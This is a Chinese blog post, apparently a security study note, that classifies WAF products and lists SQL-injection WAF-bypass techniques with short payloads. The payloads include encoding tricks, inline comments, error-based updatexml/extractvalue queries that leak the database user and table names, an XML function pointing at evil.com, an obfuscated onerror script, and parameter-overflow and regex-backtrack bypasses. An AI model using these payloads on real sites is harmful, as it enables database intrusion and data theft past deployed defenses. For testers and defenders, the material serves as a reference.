sql注入之waf绕过1()

最新推荐文章于 2024-02-08 14:30:00 发布
最新推荐文章于 2024-02-08 14:30:00 发布
阅读量394 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52699809/article/details/128207876
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

前言

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称:WAF)。 利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应 用提供保护的一款产品。

提示:以下是本篇文章正文内容,下面案例可供参考

一、常见waf分类

把WAF分为4类:
云WAF类、硬件WAF类、软件WAF类、网站内置WAF类
1 、云 waf
安全宝创宇盾、玄武盾、腾讯云、百度云、西部数码、阿里云盾、奇安信网站卫士
2 、软件 WAF
D盾:http://www.d99net.net/
云锁:https://yunsuo.qianxin.com/
网防:http://www.weishi110.cn/static/index.html
安全狗:https://www.safedog.cn/
护卫神:https://www.hws.com/
智创:https://www.zcnt.com/
悬镜:https://www.xmirror.cn/
UPUPW:https://www.upupw.net/
WTS-WAF:https://www.west.cn/
安骑士:https://help.aliyun.com/product/28449.html
dotDefender:http://www.applicure.com/Products/
3 、硬件 WAF
绿盟:https://www.nsfocus.com.cn/
安恒:https://www.dbappsecurity.com.cn/
铱(yi)迅:https://www.yxlink.com/
天融信 深信服
启明星辰
知道创宇
F5 BIG-IP:https://www.f5.com/
4 、网站内置 WAF
在搭建网站的时候,有很多企业会选择自己写过滤的规则。那么这种绕过的姿势就需要根据网站的过滤规则来尝 试了。

二、绕过方法

1.大小写绕过

Or

aNd

2.双写绕过

oorr

anandd

aanndd      这样的绕过是错误的(waf检测到第一个and时会把and删除,剩下的字母依然能                    够组合成and绕过才算成功)

3.十六进制绕过

or ——> o\x72

4.ByPass模糊匹配

常用于过滤空格等

将空格替换为/*11*/ ,把11换成 !*/ 放入bp爆破

5.关键字内联

/*!union*/

/*!select*/

6.逻辑绕过

过滤代码 1 && (select user from users where user_id = 1) = 'admin'

绕过方式 1 && (select user from users limit 1) = 'admin'

7.生僻函数绕过

MySQL/PostgreSQL支持XML函数:Select UpdateXML(‘<script x=_></script> ’,’/script/@x/’,’src=//evil.com’);          

?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

SELECT xmlelement(name img,xmlattributes(1as src,'a\l\x65rt(1)'as \117n\x65rror)); //postgresql

?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

and 1=(updatexml(1,concat(0x5c,(select user()),0x5c),1))

and extractvalue(1, concat(0x5c, (select user()),0x5c))

8.\N绕过

id=\Nunion(select 1,schema_name,\Nfrom information_schema.schemata)

9.白名单绕过

利用 PHP 中的 PATH_INFO 问题,随便挑选一个白名单加在后面,可成功 bypas
静态资源
当文件后缀名为js jpg png 等静态资源后缀请求,类似白名单机制, waf 为了检测效率,直接略过这样一些静态资 源文件名后缀的请求。
参数溢出
比如某 WAF ,默认情况下只能获取前 100 个参数进行检测,当提交第 101
参数时,那么,将无法对攻击者提交的第 100 个以后的参数进行有效安全检测,从而绕过安全防御

10.PCRE绕过

PHP 的 pcre.backtrack_limit 限制利用

union/*aaaaaaaxN*/select

总结

未完待续

大帝澧都
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
B站小迪安全笔记第十九天-SQL注入之sqlmap绕过waf
m0_61530426的博客
07-29 747
B站小迪安全笔记
SQL注入之简单的waf绕过
qi_SJQ_的博客
11-11 1120
大致思维导图: 1. WAF部署-安全狗,宝塔等waf搭建部署:宝塔比较简单,安全狗免费 简要讲解安全狗,宝塔等防护waf策略规则:比如都有什么功能 简要演示安全狗bypass sqlinject防护规则:怎么设置防护的、可以防护的工具与漏洞 实测简易CMS头部注入漏洞Bypass原理分析 安全狗: 可以自己准备一台阿里云服务器,在上边搭建好网站或靶场靶机比如:sqli-labs,先用简单些的安全狗测试再用宝塔waf插件进行测试,试试怎么绕过,自己查看与修改防护策略来加深理解等等。
Bypass 护卫神SQL注入防御(多姿势)
06-05 1575
0x00 前言​   护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。0x01 环境搭建护卫神官网:http://www.huweishen.com软件版本:护卫神·入侵防护系统 V3.8.1 最新版本下载地址:http://down.huw...
深入了解SQL注入绕过waf和过滤机制
kendyhj9999的专栏
06-06 4296
深入了解SQL注入绕过waf和过滤机制 来源:http://drops.wooyun.org/tips/968 16人收藏 收藏 2014/03/02 13:24 | r00tgrok | 技术分享 | 占个座先 知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filte
mysql 注入 绕过防火墙_绕过阿里云防火墙继续扫描探测和SQL注入
weixin_30000407的博客
02-03 723
前言如今的互联网,WAF泛滥的年代,实在让我等脚本小子苦恼ing,尤其是阿里云服务器的自带防护,那不是一般的叫人牙疼,十个站8个站都是阿里云....最近遇到几个站都是阿里云的服务器,比如:泛微e-cology7.1 SOAP注入引发的血案这篇文章中,没有拦截我的WVS对wsdl的扫描探测。在各种测试后突然发现了这个绕过阿里云防火墙的方法,不一定每一个都成功,但是能秒杀绝大部分的阿里云站,或许有许...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-03
SQL 注入中的 WAF 绕过技术 在 SQL 注入攻击中, Web 应用防火墙(WAF)是一个非常重要的安全防护机制。然而,攻击者可以使用各种技术来绕过 WAF 检测,从而达到攻击目的。本文将详细介绍 SQL 注入中的 WAF 绕过...
分块传输绕过WAF进行SQL注入1
08-03
SQL注入攻击的场景中,分块传输编码可能被用来绕过Web应用防火墙(WAF)。由于WAF通常基于预定义的规则来检测和阻止恶意请求,它可能无法正确解析分块编码的请求体,从而忽略了其中可能存在的恶意SQL语句。攻击者...
聊一聊SQL注入常用绕WAF小技巧
Javachichi的博客
02-08 1864
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
第07篇:Bypass 360主机卫士SQL注入防御(多姿势)1
08-03
0x01 环境搭建360主机卫士官网:http://zhuji.360.cn 软件版本:360主机卫士Apache 纪念版 测试环境:phpStudy本地构造S
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
WAF是时候跟正则表达式说再见-破见
11-03
WAF是时候跟正则表达式说再见-破见。难得的PPt学习资料
SQL注入渗透PostgreSQL(bypass tricks)
weixin_54787877的博客
03-13 2813
我们将研究Web应用程序防火墙的绕过方法,以及在不同的查询子句中泄漏数据的方法,例如SELECT,WHERE,ORDER BY,FROM等。 简要概述一下,PostgreSQL是: […] a free and open-source relational database management system emphasizing extensibility and technical standards compliance. It is designed to handle a range o..
WAF攻防之SQL注入
weixin_34380948的博客
02-26 279
0x00 前言随着国家安全法的出台,网络安全迎来发展的新时期,越来越多企业或政府单位开始重视网络安全。很多网站陆陆续续告别裸奔时代,开始部署web应用防火墙(WAF)以应对网络攻击。由此,相关网站的安全性很大程度上取决于WAF的防护能力,WAF攻防研究已成为安全从业人员的必修课之一。大多数WAF以规则匹配为基础进行安全防护,少数WAF带有自学习能力,规则维护成为WAF的核心。近年来,基于语义识别的...
WEB漏洞-SQL注入之堆叠及WAF绕过注入(sql学习笔记)
qq_19375535的博客
07-02 334
sql学习笔记
sql注入进阶-报错注入、盲注、order by注入、二次注入、SQL注入绕过速查表
Love&Share
09-09 1167
SQL注入 手法分类: 联合注入、报错注入、布尔盲注、延时注入、多语句查询注入(堆叠注入) 可能存在注入的点: GPC GET POST COOKIE HTTP头(请求报文及其他字段) 基础 mysql、mssql、SQL Server 以及 Oracle等,不同数据库有不同的特性 mysql 注释 #、-- (空格)、–+、/* */、/*! */(内联查询) mysql默认表 元数据数据库:information_schema(mysql5后才有) mysql表:保存了用户密码,h
sql注入及其waf绕过
最新发布
06-07
SQL注入是指攻击者通过在Web应用程序的输入参数中插入恶意SQL语句,以执行未经授权的操作。攻击者可以利用SQL注入漏洞来窃取敏感数据,修改数据库中的数据或者执行其他恶意行为。为了防止SQL注入攻击,Web应用程序通常会使用一些安全措施,例如WAF(Web应用程序防火墙)。 WAF是一个位于Web应用程序和互联网之间的设备或软件,用于监视和过滤Web应用程序的输入和输出流量,以保护Web应用程序免受各种攻击。WAF通常使用正则表达式等技术来检测恶意输入,并拦截可疑请求。然而,攻击者可以使用一些技术来绕过WAF,例如使用编码、分段、多个请求等方式来绕过WAF的检测。 为了防止SQL注入攻击和WAF绕过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的WAF,并配置正确的规则集。 5. 定期对Web应用程序进行安全审计和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值